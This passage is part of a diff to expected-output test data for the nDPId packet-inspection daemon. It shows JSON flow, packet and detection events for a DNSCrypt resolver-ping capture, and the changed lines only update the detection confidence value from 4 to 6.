AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":61,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304599} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":61,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhUAub0REv4KAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhZAAL0R0ekKAAAB0frxGZQ+AbsCCIXq8VUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhdAAL0R0egKAAAB0frxGYYUAbsCCIXq8VcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhggAL0R7icKAAAB0frxGefnAbsGBMFR8VgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304599} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhgAub0REvsKAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739304626,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304626,"pkt":"ZmZmZmZmRERERERECABFAADPni1AADcRISDR+vEZCgAAAQG7gBkAu2Pi8VmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} @@ -147,55 +147,55 @@ 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304628,"pkt":"ZmZmZmZmRERERERECABFAADPni9AADcRIR7R+vEZCgAAAQG7kQMAu1L78VaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRkgAL0RA98KAAABKU9FDapZAbsGBIt\/BsABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 